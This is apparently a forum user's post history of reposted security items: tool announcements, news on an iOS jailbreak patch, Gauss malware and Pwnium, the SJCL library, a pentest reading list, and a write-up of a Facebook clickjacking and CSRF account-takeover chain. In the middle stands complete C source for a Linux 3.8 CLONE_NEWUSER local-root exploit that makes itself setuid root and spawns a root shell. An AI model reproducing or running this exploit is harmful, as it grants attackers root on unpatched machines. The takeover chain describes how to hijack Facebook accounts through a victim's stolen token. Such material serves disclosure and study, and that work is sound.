Everything posted by Nytro
-
Hash Generator

Hash Generator is a free universal hash generator tool which automates the generation of 14 different types of hashes or checksums. It supports most of the popular hashes, including the MD5 family, the SHA family, BASE64, LM, NTLM, CRC32, ROT13, RIPEMD, ADLER32, HAVAL, WHIRLPOOL etc. (Note that BASE64 and ROT13 are reversible encodings rather than hashes, and CRC32/ADLER32 are checksums with no collision resistance; only the cryptographic hashes are suitable for integrity verification against a deliberate attacker.)

It can generate a hash for a file as well as for text input. The user can directly enter or paste any text from the clipboard and generate its hash. It also supports a 'Drag & Drop' interface, which lets you quickly drag files onto the tool for hash generation.

Hashes or checksums are mainly used for file integrity verification. Files downloaded from the Internet are often checked against a published MD5/SHA256 hash to make sure the file has not been tampered with. Hashes are also used when storing passwords and other sensitive data to protect them from prying eyes. HashGenerator helps in quickly computing or verifying the hash of any such file or password text. It works on a wide range of platforms, from Windows XP to the latest operating system, Windows 8.

Video: http://www.youtube.com/watch?v=ImBdB0aPjMs
Download: http://securityxploded.com/download.php#hashgenerator
Source: Hash Generator : All-in-one Tool to Generate Hash MD5/SHA1/SHA256/SHA512/BASE64/LM/NTLM/CRC32 | www.SecurityXploded.com
-
Apple's New iOS Update Blocks Evasi0n Jailbreak--After It's Been Used About 18 Million Times

After 43 days of jailbreaking frenzy, Apple has closed the cell doors again. The latest 6.1.3 update to iOS, released Tuesday, includes a patch that prevents the use of the hacking tool evasi0n, which since early February has become the most popular program ever for "jailbreaking" phones and tablets to remove their software restrictions.

David Wang, one of the four hackers who created evasi0n, confirms that the new update includes a patch for a bug in iOS's time zone settings, one of a series of vulnerabilities that allowed users to dismantle the iPhone's and iPad's considerable security measures. Wang first spotted the bug fix in the beta version of the update released to developers last month.

Update: In fact, Apple writes in notes accompanying the update that it has fixed six bugs in total, and graciously credits the hackers behind evasi0n with making the company aware of four of them.

In the six weeks since evasi0n was released, however, close to 18 million devices have already been jailbroken, according to data from Jay Freeman, the administrator of the Cydia app store for jailbroken devices. He says he's counted 18.2 million unique devices running iOS 6 visiting Cydia, including 13.8 million iPhones, 3.4 million iPads, and 1.1 million iPod Touches. Those numbers vastly exceed previous jailbreaks such as Jailbreakme 3, a popular hacking tool for iOS released in the summer of 2011 that was used on around 2 million devices, according to a count at the time by creator Nicholas Allegra.

Aside from blocking evasi0n, the update also fixes a bug in iOS that let anyone bypass an iPhone's lockscreen using its emergency call function, allowing partial access to the phone's private data and even the ability to make calls.

Compared to some previous jailbreaks, Apple took its time in patching evasi0n. By contrast, the company took only nine days to fix the bugs exploited by Jailbreakme 3. But that tool allowed anyone to jailbreak his or her phone or tablet simply by visiting a website, creating the risk that it would be repurposed by malicious hackers to perform "drive-by downloads" of malware onto Apple devices that visited an infected website. Evasi0n, on the other hand, requires a USB connection between the device being jailbroken and a PC, vastly reducing the risk that it could be used for malicious purposes. "If there's no injection vector they know about that lets you activate the attack through drive-by, [Apple doesn't] seem to put much priority on it," says Wang.

Wang says that at least one of the bugs used in evasi0n remains in Apple's mobile operating system. And he's told me previously that the hacker team who cooperated on evasi0n, known as the evad3rs, has a backup supply of secret bugs in iOS that they're saving for future jailbreak tools. It's unclear how many of those bugs might be patched in iOS 6.1.3. But for now, anyway, they don't plan to waste them on creating a new tool. "We'll probably wait until the next major release," says Wang.

That means any user who updates to iOS 6.1.3 will lose the ability to jailbreak his or her phone for months or possibly years to come. But Wang says there's still no fix available to jailbreakers for the lockscreen vulnerability that's also patched in this update. So any jailbreak fan who forgoes Apple's latest update should also take extra care not to let their phone out of their sight.

Source: Apple's New iOS Update Blocks Evasi0n Jailbreak--After It's Been Used About 18 Million Times - Forbes
-
Puzzle box: The quest to crack the world's most mysterious malware warhead
State-sponsored Gauss contains secret warhead eluding global cracking experts.
by Dan Goodin - Mar 14 2013

It was straight out of your favorite spy novel. The US and Israel felt threatened by Iran's totalitarian-esque government and its budding nuclear program. If this initiative wasn't stopped, there was no telling how far the growing conflict could escalate. So militaries from the two countries reportedly turned to one of the most novel weapons of the 21st century: malware. The result was Stuxnet, a powerful computer worm designed to sabotage uranium enrichment operations. When Stuxnet was found infecting hundreds of thousands of computers worldwide, it was only a matter of time until researchers unraveled its complex code to determine its true intent.

Today, analysts are up against a similar challenge. But they're finding considerably less success taking apart the Stuxnet cousin known as Gauss. A novel scheme encrypting one of its main engines has so far defied attempts to crack it, generating intrigue and raising speculation that it may deliver a warhead that's more destructive than anything the world has seen before.

Gauss generated headlines almost immediately after its discovery was documented last year by researchers from Russia-based antivirus provider Kaspersky Lab. State-of-the-art coding techniques that surreptitiously extracted sensitive data from thousands of Middle Eastern computers were worthy of a James Bond or Mission Impossible movie. Adding to the intrigue, code signatures showed Gauss was spawned from the same developers responsible for Stuxnet, the powerful computer worm reportedly unleashed by the US and Israeli governments to disrupt Iran's nuclear program. Gauss also had links to the highly advanced Flame and Duqu espionage trojans.

Gauss contains module names paying homage to the German mathematicians and scientists Johann Carl Friedrich Gauss, Kurt Friedrich Gödel, and Joseph-Louis Lagrange. Its noteworthy features only start there. Gauss has the ability to steal funds and monitor data from clients of several Lebanese banks, making it the first publicly known nation-state sponsored banking trojan. It's also programmed to collect a dizzying array of information about the computers it infects, including network connections, processes and folders, BIOS, CMOS, RAM, and both local and removable drives.

But the most intriguing characteristic of Gauss is an encrypted payload that has so far remained undeciphered, despite the best efforts of cryptographers who have already tried millions of possible keys. Tucked deep inside the Gödel module, the secret warhead is loaded onto USB sticks and removable drives when they're connected to Gauss-infected machines. When the drives are plugged into an uninfected computer later, the mysterious code is executed, but only if it encounters the specific machine or machines targeted by the Gauss developers. On every other computer, the module remains cloaked in an impenetrable envelope that prevents researchers and would-be copycats from reverse engineering the code. The extreme stealth has stoked speculation that the payload may contain a potent exploit that could rival the Stuxnet attack that was bent on destroying uranium centrifuges inside Iran's high-security Natanz enrichment facility. Certainly not your everyday malware.

"Considering the link with Flame and Stuxnet, the payload of Gauss must be of similar magnitude," Costin Raiu, director of Kaspersky Lab's global research and analysis team, told Ars. "Given how careful the attackers were to make sure the Gauss payload doesn't fall into the 'wrong' hands, we can assume it is very special."

[Figure: The Gauss architecture. Credit: Kaspersky Lab]

Built to last

Gauss is by no means the first malware with a payload that was programmed to remain dormant unless it was installed on computers meeting a narrow set of criteria. Stuxnet also contained code instructing it to destroy uranium-enrichment centrifuges only when they were physically located at Natanz. Researchers have theorized that the trigger was implemented to reduce the chances of collateral damage that might result if Stuxnet took hold in other facilities. (The precaution proved wise, since Stuxnet infected more than 100,000 computers scattered all over the globe.)

But as cryptographer Nate Lawson observed more than two years ago, the mechanism Stuxnet used to protect unintended targets from destruction was surprisingly crude for an otherwise advanced cyberweapon developed by countries with almost unlimited budgets. The coding techniques were largely limited to conditional "if/then" range checks that identified computers running German conglomerate Siemens's Simatic Step7 software inside Natanz. If an infected computer met the criteria, the sabotage payload was activated. If not, the exploit sat dormant. Noticeably absent from Stuxnet was any kind of mechanism preventing researchers, enemies, or potential copycat programmers from peering inside the malware to see what the highly selective payload did. That's precisely what security experts such as Ralph Langner did following the Stuxnet discovery. Within a few weeks, the world had its answer: Stuxnet was a powerful cyberweapon unleashed by a well-resourced government bent on sabotaging Iran's nuclear program. While the developers may have taken care to prevent the worm from attacking other countries, they did little to conceal the true aim and methods of their malware, which attacked programmable logic controllers at the heart of the enrichment process.

"Encrypting your payload so that only the intended target can decrypt it hides both the identity of the victim and the worm's purpose," Lawson recently told Ars. "If Gauss came after Stuxnet, it's clear the authors disliked the publicity its PLC [programmable logic controller] payload received and made an effort to hide it properly the second time."

The notion of software containing a "secure trigger" isn't new either. Scientists such as Fritz Hohl theorized about it as early as 1998 in a paper titled "Time Limited Blackbox Security: Protecting Mobile Agents From Malicious Hosts." Researchers from security firm Core Security expanded on the idea eight years later in a paper titled "Foundations and applications for secure triggers." The idea was to use strong cryptography to ensure a piece of code or content remained secret until a particular event occurred. Once the preselected condition was met, and only if it was met, the concealed payload was automatically disclosed or executed. Otherwise it remained locked inside an impenetrable vault.

Gauss developers implemented this advanced concept using a surprisingly unsophisticated set of tools. That set includes the relatively archaic RC4 cipher to encrypt three sections of the Gödel module and the cryptographically weak MD5 algorithm to generate the key. Gauss developers likely chose the outdated design because it worked reliably across a broad range of Windows computers thanks to the Microsoft CryptoAPI. Keys unlocking the Gödel payload are generated dynamically based on the settings of one or more computers that were specifically targeted by the attackers. Only the machine or machines containing a specific set of programs and directories will generate the key. To confound people trying to crack the code, and to considerably slow the speed at which they work, Gauss MD5-hashes the configuration data 10,000 times and uses the final output as the key that unlocks the encrypted code.

[Figure: Gödel's mysterious encrypted data is stored in three sections. Credit: Kaspersky Lab]

Specifically, Gauss enumerates the first entry of an infected computer's PATH environment variable, which specifies the Windows directories where executable files can be called without specifying their precise location. Gauss then combines that PATH location with the name of the first directory found in the infected computer's Windows Program Files folder. It takes this string, appends a 16-byte hard-coded cryptographic salt value to it, and then hashes the new string 10,000 times. It compares the final hash against a hard-coded verification block. If the hash doesn't pass the verification check, Gauss starts the process all over again, this time appending the second entry of the PATH to the first Program Files folder. The process is repeated until each entry in the PATH has been appended to each entry in Program Files. If a hash value passes the verification check, Gauss has located the PATH entry and program folder that the Gödel module was programmed to find. It then takes that string, appends a new salt value to it, and hashes it 10,000 times. The resulting hash is the RC4 key used to decrypt one of the three encrypted Gödel sections. If the decrypted block passes an additional verification check, Gauss takes the same PATH and Program Files string and appends a different hard-coded salt to derive the key that decrypts sections two and three.

[Figure: A simplified flow-chart showing Gödel's decryption routine. Credit: Eric Bangeman]

[Figure: Example of the string pair, with the second string starting from "~dir", and the first salt. Credit: Kaspersky Lab]

Researchers believe the routine was put in place to attack a computer or computers with a specific program installed. One of the checks Gauss performs ensures that the first letter or symbol of the targeted Program Files directory is a special character such as a tilde (~) or brace ({), or comes from Arabic, Hebrew, or another language with an extended character set. Given the detailed logic built into Gödel, it's fair to assume the attackers had cased their intended target for months or years, using another module in Gauss or other espionage trojans altogether.

Literally take forever

The use of real Windows configuration variables poses some unusual challenges for cryptographers trying to crack the payload. While the number of possible inputs, for instance, could theoretically be 2^1000 or higher, the actual number is almost certainly far lower, since real-world path strings are almost always in human-readable form. (While a password may be randomly generated, path strings typically follow conventions such as "C:\Program Files\Common Files\Microsoft Shared\Windows Live.") Then again, the strings still have the ability to incorporate unique names or even randomly generated values few eyes have ever seen before. The likelihood that the sought-after Program Files folder contains characters from a different language could pose its own obstacles and benefits. While it narrows the possible choices, it may also require crackers to incorporate alphabets bigger than those that include standard English characters.

"Password cracking becomes more difficult as the input space grows," Karsten Nohl, a cryptographer with Security Research Labs, told Ars. "The input space for the Gauss unlock password is all names of Windows programs in certain languages, which should be a relatively small space compared to the billions of combinations a password cracker typically tries. However, nobody has a complete list of Windows programs." He continued: "To find the Gauss unlock password, good heuristics are needed that guess Windows program names. Simply brute-forcing the space from '???...' to '???...' is not an option as it would literally take forever."

So far, Kaspersky researchers have tried millions of combinations to no avail. In December, they redoubled their efforts by recruiting the creator of the Hashcat password recovery program. That resulted in ocl-GaussCrack, an open-source application that streamlines the cracking of the Gödel module and harnesses the speed of graphics cards to accelerate the process. Typically, GPU crackers can try billions of guesses per second against MD5-derived hashes, but thanks to the design of the encryption routine, GaussCrack can achieve just 489,000 candidate passcodes each second. Iterating the hash 10,000 times, a technique often referred to as key stretching, is what imposes that burden on crackers.

Just as the amassing of hundreds of millions of real-world passwords has fueled recent advances in password cracking, a comprehensive corpus of likely Windows configurations targeted by Gauss is the most likely way to solve the Gödel mystery. Jens Steube, the Hashcat and GaussCrack developer better known as Atom, said he still hasn't settled on the best method for compiling the data. One possibility is to tap into databases already assembled by antivirus companies or other vendors of software that collect the names of programs installed on hundreds of millions of computers. Another possibility, Kaspersky's Raiu said, is to seek help from the National Institute of Standards and Technology or a similar organization.

The encrypted payload in the Gödel module is by no means the only mystery surrounding Gauss. Researchers still don't know how the malware takes hold of target computers in the first place or how it spreads from one machine to another. They're also at a loss to explain why Gauss installs a custom font known as "Palida Narrow" and corresponding registry values on infected machines. Analysts have speculated that the font may be used to steganographically fingerprint the author of certain printed materials. Under alternate theories, Palida Narrow, which appears to contain valid Western, Baltic, and Turkish symbols, may provide a simple means for websites to identify infected machines, or even open a font-based vulnerability to exploit.

Also unexplained is the Round Robin DNS load balancing technique deployed by control servers used to ferry traffic to and from Gauss-infected machines. The setup suggests that the command servers handled massive amounts of traffic, and yet so far, Kaspersky researchers have been able to find just 2,500 computers infected by the malware. The effort Gauss architects expended setting up the load-balancing system indicates that the true number of affected machines could be in the tens of thousands.

Still, the biggest mystery connected to Gauss undoubtedly remains the encrypted payload tucked inside its Gödel module. Given the destruction malware creators brought about with Stuxnet, it wouldn't be a stretch if Gauss targeted additional enemy-operated PLCs or an entirely unseen class of equipment in the fledgling annals of computer warfare. The choice that Gödel be transmitted using USB drives suggests it was targeting "air-gapped" systems so sensitive they weren't connected to the Internet.

"It's one of the biggest mysteries of our times and this is a very cool challenge for any security researcher out there who cares about security," Raiu told Ars. "What could we find inside the Gauss payload? PLC code? Zero-days? Code to target unknown systems? Nobody knows for sure and it is probably the incertitude which makes it the most captivating mystery."

Thanks to Jeremy Gosney of Stricture Consulting Group, Hashcat developer Jens Steube, and Johns Hopkins University professor Matt Green for their assistance in reporting this story. Story updated to add "reportedly" in first paragraph.

Source: Puzzle box: The quest to crack the world's most mysterious malware warhead | Ars Technica
-
UI Redressing against Facebook

In this post, I'm going to discuss a possible attack scenario, targeting the Facebook web application, that could lead to the reset of account passwords in an automated fashion, exploiting a UI Redressing issue with the use of a cross-domain extraction technique.

UI Redressing bug, again

During my research, I discovered a Facebook web resource that is not protected by the X-Frame-Options header and that includes the fb_dtsg token, which is adopted as an anti-CSRF token (Figure 1). The affected URL is the language-selection page (link title: "Selectează limba | Facebook").

[Figure 1 - Facebook's web resource vulnerable to UI Redressing attacks.]

The iframe-to-iframe extraction method can be applied here to extract fb_dtsg's value and, consequently, perform a series of Cross-Site Request Forgery attacks against the integrity of the victim's profile data.

The theory behind the Facebook profiles takeover

Facebook allows users to add a mobile number that, once certified, can be used as a username to log in or to reset the account's password. Users can insert their mobile numbers via Account Settings > Mobile > Add a phone > "add your phone number" (Figure 2 and Figure 3): a confirmation code is then sent by Facebook's system to the user's mobile phone, and it must be entered (Figure 4) to complete the activation process.

[Figure 2 - Users can add their mobile number via the "add your phone number here" link.]

[Figure 3 - Facebook's form used to add a mobile number.]

[Figure 4 - A confirmation code is sent to the user's mobile and must be entered to complete the process.]

The main issue here is that no password is required to associate the mobile number with the user's profile. Because of this, an attacker may abuse the described UI Redressing vulnerability to steal the fb_dtsg token and register an arbitrary phone number. The attacker still needs to enter the confirmation code in order to associate his mobile number. A bit of black magic helps here: the attacker can abuse an SMS-to-mail mobile application to automatically forward Facebook's text message (SMS) to an attacker-controlled mailbox, thus allowing a hypothetical exploit to fetch the code and complete the insertion process.

The exploit

A working Proof of Concept exploit has been developed in order to demonstrate the described attack. We have also shared the code with the Facebook security team. During my experiments, the Android application SMS2Mail was used to forward the Facebook SMS (Figure 5) to the mailbox (Figure 6).

[Figure 5 - SMS with the Facebook confirmation code that has been forwarded to the attacker's mailbox.]

[Figure 6 - Facebook confirmation code forwarded to the attacker's mailbox.]

The following steps summarize the exploitation phases:

1. The exploit frames the vulnerable resource and lets the victim play a fake game while performing the cross-domain content extraction;
2. The fb_dtsg anti-CSRF token and the victim's user id are extracted. An HTTP request is forwarded to the Facebook application in order to emulate the registration of the attacker-controlled mobile number;
3. A text message (SMS) containing the confirmation code is sent to the attacker's mobile device. The SMS2Mail mobile application, installed on the attacker's device, automatically forwards the SMS to an attacker-controlled mailbox;
4. The exploit waits for the SMS to be forwarded to the mailbox, then extracts the confirmation code and performs a second CSRF attack in order to submit the code itself and complete the mobile number registration.

The attacker's mobile number is now associated with the victim's profile and can be used to reset the account's password. As a matter of fact, Facebook allows users to enter a previously associated mobile number (Figure 7), which is then used to send a reset code (Figure 8).

[Figure 7 - Reset password mechanism involving the user's mobile number.]

[Figure 8 - Facebook's form used to insert the reset code.]

A fully automated Proof of Concept exploit can be downloaded here, while the following video illustrates the described attack:

Posted by Luca De Fulgentis, Tuesday, March 19, 2013
Source: Nibble Security: UI Redressing against Facebook
-
GNU/Linux kernel (3.8+) Privilege Escalation Vulnerability

```c
/* clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer
 *
 * A child cloned with CLONE_NEWUSER|CLONE_FS shares the parent's fs_struct
 * (current and root directory). Writing "0 <uid> 1" to the child's uid_map
 * makes the unprivileged caller uid 0 inside the new user namespace, which is
 * enough for the child to chroot(); because the fs_struct is shared, the
 * parent ends up inside that chroot too. The parent then execs the setuid
 * /bin/su, whose ELF interpreter path (/lib64/ld-linux-x86-64.so.2) now
 * resolves to a hard link of this binary, so this binary runs as euid 0 and
 * makes the link setuid root. A process forked earlier, still outside the
 * chroot, sees the file turn root-owned and execs it to get a root shell.
 *
 * Affects 3.8 through 3.8.2; fixed in 3.8.3, which rejects
 * CLONE_NEWUSER|CLONE_FS (CVE-2013-1858). Needs x86-64, a setuid /bin/su,
 * and a current directory on the same filesystem as /bin/su, since link()
 * cannot cross filesystems. Build it statically linked: the kernel loads it
 * as su's interpreter, so there is no dynamic loader available to it.
 */
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

int go[2];
char child_stack[1 << 20];
extern char **environ;

void die(const char *msg)
{
	perror(msg);
	exit(errno);
}

/* runs in the new user namespace: wait for the uid mapping, then chroot */
int child(void *arg)
{
	char c;

	close(go[1]);
	read(go[0], &c, 1);
	setuid(0);
	if (chdir("chroot") < 0)
		die("[-] chdir");
	if (chroot(".") < 0)
		die("[-] chroot");
	return 0;
}

/* fake root: this binary as the loader, the real setuid su as /bin/su */
int setup_chroot(const char *me)
{
	mkdir("chroot", 0755);
	mkdir("chroot/lib64", 0755);
	mkdir("chroot/bin", 0755);
	if (link(me, "chroot/lib64/ld-linux-x86-64.so.2") < 0)
		die("[-] link");
	if (link("/bin/su", "chroot/bin/su") < 0)
		die("[-] link");
	return 0;
}

int main(int argc, char *argv[])
{
	char *su[] = {"/bin/su", NULL};
	char *sh[] = {"/bin/bash", NULL};
	char me[256], *mee[] = {me, "1", NULL};
	char uidmap[128], map_file[128];
	pid_t pid;
	struct stat st;
	int fd;

	if (geteuid() == 0 && argc == 1) {
		/* running as su's "loader" inside the chroot, with euid 0 */
		printf("[+] Yay! euid=%d uid=%d\n", geteuid(), getuid());
		chown("lib64/ld-linux-x86-64.so.2", 0, 0);
		chmod("lib64/ld-linux-x86-64.so.2", 04755);
		exit(0);
	} else if (geteuid() == 0) {
		/* this will run outside, once the binary is setuid root */
		setuid(0);
		execve(*sh, sh, environ);
		die("[-] execve");
	}

	printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer\n\n");

	memset(me, 0, sizeof(me));
	readlink("/proc/self/exe", me, sizeof(me) - 1);
	printf("[+] Found myself: '%s'\n", me);

	if (fork() > 0) {
		printf("  [*] Parent waiting for boomsh to appear ...\n");
		for (;;) {
			stat(me, &st);
			if (st.st_uid == 0)
				break;
			usleep(1000);
		}
		execve(me, mee, environ);
		die("[-] execve");
	}

	printf("  [*] Setting up chroot ...\n");
	setup_chroot(me);
	printf("[+] Done.\n  [*] Cloning evil child ...\n");

	if (pipe(go) < 0)
		die("[-] pipe");
	pid = clone(child, child_stack + sizeof(child_stack),
		    CLONE_NEWUSER | CLONE_FS | SIGCHLD, NULL);
	if (pid == -1)
		die("[-] clone");

	printf("[+] Done.\n  [*] Creating UID mapping ...\n");
	snprintf(map_file, sizeof(map_file), "/proc/%d/uid_map", pid);
	if ((fd = open(map_file, O_RDWR)) < 0)
		die("[-] open");
	snprintf(uidmap, sizeof(uidmap), "0 %d 1\n", getuid());
	if (write(fd, uidmap, strlen(uidmap)) < 0)
		die("[-] write");
	close(fd);
	printf("[+] Done.\n");

	/* release the child so it chroots us both, then run su inside the chroot */
	close(go[0]);
	write(go[1], "X", 1);
	waitpid(pid, NULL, 0);
	execve(*su, su, NULL);
	die("[-] execve");
	return -1;
}
```

Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
-
Romania, te iubesc! - Hackerville [Full Episode]
Nytro replied to Silviu's topic in Security News
I reopened the topic because, even though there is a lot of rambling in it, it is an important subject: how we see hackers, who they are and what they do. Moreover, the main subject, this documentary, sheds some light on certain situations, even if it rambles in places. It is a free country and everyone has the right to express their opinion and to respect, or not, the people who give interviews.
-
Google Chrome OS Linux WAS Exploited at Pwnium 2013 for $40,000
Nytro replied to Nytro's topic in Security News
Yes, they don't work from nist.gov either, they are the same ones, probably removed by Google. This one is interesting: National Vulnerability Database (NVD) National Vulnerability Database (CVE-2013-0913), kernel 3.8. And the other one, with a few more details: http://www.scip.ch/en/?vuldb.8021
-
Google Chrome OS Linux WAS Exploited at Pwnium 2013 for $40,000
By Sean Michael Kerner | March 18, 2013

From the 'Linux Kernel Exploit' files:

Earlier this month, Google Chrome running Chrome OS (Linux!) was hailed as being a survivor of the Pwnium/Pwn2Own event that hacked the IE, Firefox and Chrome browsers on Windows. Apple's Safari running on Mac OS X was not hacked and neither (apparently) was Chrome on Chrome OS.

Google disclosed this morning that Chrome on Chrome OS had in fact been exploited, albeit unreliably. The same researcher that took Google's money last year for exploiting Chrome, known publicly only as 'PinkiePie', was awarded $40,000 for exploiting Chrome/Chrome OS via a Linux kernel bug, a config file error and a video parsing flaw.

Google has already fixed the flaws in Chrome OS 25.0.1364.173, BUT seeing as this is a Linux kernel flaw, I'm very curious whether it affects any/all other Linux distros. As is typical for Google, they offer very little in the way of full disclosure or detail on the flaws fixed. All that Google has publicly posted so far is:

[181083] High CVE-2013-0915: Overflow in the GPU process. Credit to Pinkie Pie.
[chromium-os:39733] High CVE-2013-0913: Time-of-Check/Time-of-Use and counting overflows in i915 driver. Credit to Pinkie Pie.

Neither of those issues is specifically identified as a 'Linux kernel' issue (though i915 is the kernel's DRM driver for Intel graphics). Google has also not publicly opened up those CVEs, so it's not possible to see the exact bug (which possibly could be in the kernel). As Google is a responsible firm, I'd suspect/hope that the bug has been submitted upstream, though right now it's not super clear to me where that is. In any event, it's a chained bug and not something that was a reliable exploit, but still, it would/will be good to see it eliminated from the mainline Linux kernel sooner rather than later.

Source: Google Chrome OS Linux WAS Exploited at Pwnium 2013 for $40,000 - InternetNews.
-
Stanford Javascript Crypto Library

The Stanford Javascript Crypto Library (hosted here on GitHub) is a project by the Stanford Computer Security Lab to build a secure, powerful, fast, small, easy-to-use, cross-browser library for cryptography in Javascript.

SJCL is easy to use: simply run sjcl.encrypt("password", "data") to encrypt data, or sjcl.decrypt("password", "encrypted-data") to decrypt it. For users with more complex security requirements, there is a much more powerful API, described in the documentation and illustrated in this demo page.

SJCL is small but powerful. The minified version of the library is under 6.4KB compressed, and yet it posts impressive speed results. (TODO: put up a benchmarks page.)

SJCL is secure. It uses the industry-standard AES algorithm at 128, 192 or 256 bits; the SHA256 hash function; the HMAC authentication code; the PBKDF2 password strengthener; and the CCM and OCB authenticated-encryption modes. Just as importantly, the default parameters are sensible: SJCL strengthens your passwords by a factor of 1000 (1000 rounds of PBKDF2) and salts them to protect against rainbow tables, and it authenticates every message it sends to prevent it from being modified. We believe that SJCL provides the best security which is practically available in Javascript. (Unfortunately, this is not as great as in desktop applications because it is not feasible to completely protect against code injection, malicious servers and side-channel attacks.)

SJCL is cross-browser. We hope. We've tested it on all the installed browsers on the security lab computers (including various versions of Internet Explorer, Chrome, Firefox, Safari and Opera on Mac, Linux and Windows) and on the Rhino engine, but still need to do more comprehensive testing. We have a test page up on this site; if it reports any failures, please report an issue.

SJCL is open. You can use, modify and redistribute it under a BSD license or under the GNU GPL, version 2.0 or higher.

SJCL supports primarily symmetric-key cryptography, but there's an experimental branch with elliptic curve support (ECDH public key encryption and ECDSA signatures).

SJCL was written by Emily Stark, Mike Hamburg and Dan Boneh at Stanford University. Special thanks to Aldo Cortesi and Roy Nicholson for reporting bugs in earlier versions of SJCL. A whitepaper on SJCL (also by Emily Stark, Mike Hamburg and Dan Boneh) was published in the 2009 Annual Computer Security Applications Conference.

Source: Stanford Javascript Crypto Library
-
Resources for Aspiring Penetration Testers
Scott Sutherland
March 11, 2013

At some point, all penetration testers get asked, “Where did you learn all this stuff?” In my experience, the question often comes from clients and students interested in pen testing. Usually, they’re asking because they aren’t sure where to start. There are a number of two- and four-year college programs that can provide a nice structured approach, but generally I think penetration testing is like any other skillset; if you find the right resources, a good direction, and study hard, you’ll acquire the skills you’re looking for. However, I will say that it does help to already have a strong IT background. Regardless of the path taken, it’s nice to have some decent resources along the way. In this blog, I’ve put together a list of books and online training resources that cover topics and skills that I’ve found useful as a penetration tester. Hopefully the list is also useful to those of you interested in getting your feet wet. Have fun and Hack Responsibly!

Recommended Books

Read, read, and read some more. Recommending that people “Read the F***ing Manual” (RTFM) is just as important today as it was 20 years ago. The list below is really directed at specific tasks that most penetration testers have to perform. I’m aware that there are some obvious gaps in the list, but I haven’t found any books that I really love related to privilege escalation, network attacks, AV evasion, or penetration testing as a profession. Regardless, I hope you enjoy the books as much as I have.

Web Application Hacker’s Handbook 2nd Edition
Every penetration tester should have a copy of this book. It has good coverage on a lot of web application attack methods with an emphasis on Burp Suite, which is a very robust local HTTP proxy.

SQL Injection Attack and Defense
This book is very complementary to the Web Application Hacker’s Handbook. It provides a pretty straightforward approach for identifying and exploiting SQL injection flaws on common database platforms. As a side note, I also recommend playing with Burp Suite and SQLMap while learning how to perform SQL injection attacks.

Web Application Obfuscation
This book is also complementary to the Web Application Hacker’s Handbook and SQL Injection Attack and Defense. It provides a decent overview of techniques that can be used to essentially hide your attacks from web application firewalls, intrusion prevention systems, and web application input filters.

Database Hacker’s Handbook
This is an oldie but a goody. It provides some great coverage on how to attack the common database platforms. This can come in handy if you’re hoping to escalate your privileges at the database level after finding a SQL injection issue.

Managed Code Rootkits
This book provides manual and automated methods for reverse engineering managed code applications and frameworks. It covers the .NET framework, Java RTE, and Dalvik applications. I thought it was interesting because it has a large focus on actually poisoning the frameworks instead of the application directly. However, it should be noted that this book does not focus on advanced debugging techniques like most reversing books.

A Guide to Kernel Exploitation: Attacking the Core
Not all penetration testers spend their days developing kernel exploits, but it’s still good to know the basics. This book has a focus on understanding kernel exploits and how they actually expose operating system vulnerabilities. So far, it’s been a good read, but I haven’t finished it yet. Someone also recently recommended The Shellcoder’s Handbook to me, so consider that as well.

Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software
I liked this one a lot. It provides a good assembly primer which can come in handy in a lot of ways during a penetration test. It also provides decent coverage in areas that you would expect like static and dynamic malware analysis, file structures, test handlers, packers, and debugging. I’ve also heard that the IDA PRO Book is great if you want to become the reversing master of the universe. However, I don’t actually own it at the moment.

Gray Hat Python
I really like this book as well. It’s a quick read and it does a good job of describing different debugging, injection, and fuzzing techniques. It also provides a lot of sample code that can be used to perform tasks like hooking and DLL/code injection. I’ve found both techniques to be quite handy for avoiding anti-virus solutions and stealing data protected with encryption.

Windows® Internals, Part 1 / Part 2: Covering Windows Server® 2008 R2 and Windows 7
I will most likely never finish either of these books in their entirety. However, they do make great references. If you ever need to know anything about how any part of Windows works, these are the go-to books.

Network exploration and security auditing cookbook
Nmap has become one of the fundamental “tools of the trade” over the past decade or so. In my opinion, it’s as valuable to administrators as it is to attackers. I think that every IT professional should know what Nmap is and how to use it. This book is a great start for someone who has not been exposed to it in the past. It covers everything from basic system discovery to writing your own plugins to scan for vulnerabilities.

MetaSploit: A Penetration Tester’s Guide
MetaSploit has also become one of the fundamental “tools of the trade” in recent years. There is a lot of community involvement and I think this is a good book for beginners who want to learn more about MetaSploit and some practical use cases.

Free Online Training and Vulnerable VMs

Obviously, there are tons of great blogs, training sites, and vulnerable VMs/applications out there. I will not be covering all of them. However, I’ve tried to include online resources that are valuable for beginners and veterans alike.

SecurityTube
SecurityTube is like YouTube, but the videos are dedicated to teaching penetration test skills. Our intern actually recommended this site to me before I knew what it was. Since that time, I’ve been checking every time I start learning a new topic just to see if they have already covered it. I feel the quality of the tutorials is great and obviously recommend it.

Irongeek
It’s not a pretty site, but it provides a lot of good content. It is also known for releasing video presentations from security conferences in record time.

MetaSploit Unleashed
This web site provides a free online course all about MetaSploit. They do ask for donations to fund Hackers for Charity which raises funds for underprivileged children in East Africa. It’s a great site with a great cause – I recommend checking it out.

VulnHub
Reading only gets you so far. Most people in IT are hands-on learners, so in order to get your hands dirty I recommend checking out VulnHub. This is a relatively new site that supplies virtual machines that are designed to be vulnerable. For those of you looking for a quick way to set up a testing lab at home, this may be the most cost/time effective solution.

Bug bounties
If you feel you have the skills that can now pay the bills, there are lots of companies willing to pay real money if you find a big issue in their product. Below is a site dedicated to consolidating a list of the companies currently paying “bug bounties”.

Good Google Searches

As I mentioned earlier, I haven’t been able to find books that cover everything I’d like them to. Where books fail, Google usually succeeds. I suggest using it to find good archived presentations from security conferences such as Defcon, Blackhat, DerbyCon etc. Below I’ve also provided some topics that you might find interesting.

Windows Penetration and Escalation
In my experience, 90% of enterprise environments are Windows-based operating systems that centralize access control around Active Directory Services. Therefore, it’s good to have an understanding of the tools and techniques used to escalate privileges in those environments. Unfortunately, I have yet to find a single book that covers it well; below are some basic keywords, vulnerability categories, and tools to get you started.

Default passwords
Clear text passwords
Excessive privileges: Users, services, gui, files, registry, memory
Insecure local and remote services
Insecure scheduled tasks
Local and remote exploits
Password guessing: medusa, hydra, bruter, and MetaSploit
